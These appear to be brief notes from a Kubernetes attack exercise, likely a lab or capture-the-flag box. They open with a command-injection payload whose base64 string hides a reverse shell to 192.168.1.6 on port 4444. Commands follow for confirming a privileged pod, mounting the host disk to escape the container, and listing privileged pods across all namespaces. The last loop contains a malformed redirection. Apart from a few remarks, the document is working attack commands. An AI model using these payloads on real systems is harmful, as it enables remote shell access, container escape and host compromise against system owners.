Easy command breakout

192.168.1.6; echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjYvNDQ0NCAwPiYx | base64 -d | bash

Enumerate privileged container

# hostname
health-check-deployment-f9d6f6f9c-59w8r

┌──(root㉿kali)-[~]
└─# kubectl get pod health-check-deployment-f9d6f6f9c-59w8r -o json | jq -r '.spec.containers[].securityContext.privileged'
true

We can mount ourselves to the host filesystem

# mount /dev/sda2 /tmp/bruh

haha i spent 40 mins writing this

while read i ; do  echo -n "$(echo $i | awk '{print "pod: "$3", namespace: "$2}'), privileged:" ; bash -c "kubectl get pod $i -o json" | jq -r '.spec.containers[].securityContext.privileged' ; done  <=(kubectl get pod -o wide -A | awk '{print "-n " $1 " " $2}' | tail -n +2)